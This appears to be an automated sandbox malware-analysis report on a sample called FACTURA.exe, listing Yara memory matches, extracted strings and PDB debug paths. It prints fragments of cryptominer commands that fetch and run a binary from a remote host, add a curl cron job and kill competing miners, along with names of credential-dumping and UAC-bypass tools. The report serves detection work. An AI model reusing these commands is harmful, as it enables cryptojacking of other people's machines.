Source: Yara match File source: 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6270634530.00000197A4698000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: ld_library_path/tmp/udevs-acryptonight-ostratum+tcp://pool.fri3nds.in:8080-ulinuxserver-px-t$threads-bfiecho"*/5****curl-
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: xmrminer
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: URL of mining server
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: curl-fssl${url}/h2-o/tmp/avalonsaber||wget-q${url}/h2-o/tmp/avalonsaber)&&chmod+x/tmp/avalonsabernohup/tmp/avalonsaber-opool.minexmr.com
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: XMRig 2.15.1-beta

Compliance:

barindex
Uses 32bit PE files
Source: FACTURA.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918404291.00000000030C0000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source: Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: he#@1.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: fastfat.pdbN source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: sctasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: usp10.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: reg.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: mgr.pdb source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp
Source: Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp
Source: Binary string: bot.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: comp.pdbd source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source: Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source: Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: .+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: c:\projects\cuspidPowershell\cuspid\EmbeddedDlls\AMSIFinder\AMSIFinder\obj\Release\AMSIFinder.pdb source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source: Binary string: CryptoService.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.2855689224.000000000292F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source: Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp
Source: Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: winlogon.PDB source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: 0.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source: Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbx source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source: Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp
Source: Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000005.00000003.2859654211.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2926621250.0000000006131000.00000004.00000001.sdmp
Source: Binary string: joy.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp
Source: Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp
Source: Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source: Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbj source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: mshta.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source: Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: ddraw.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source: Binary string: wbadmin.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source: Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source: Binary string: Unite.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source: Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
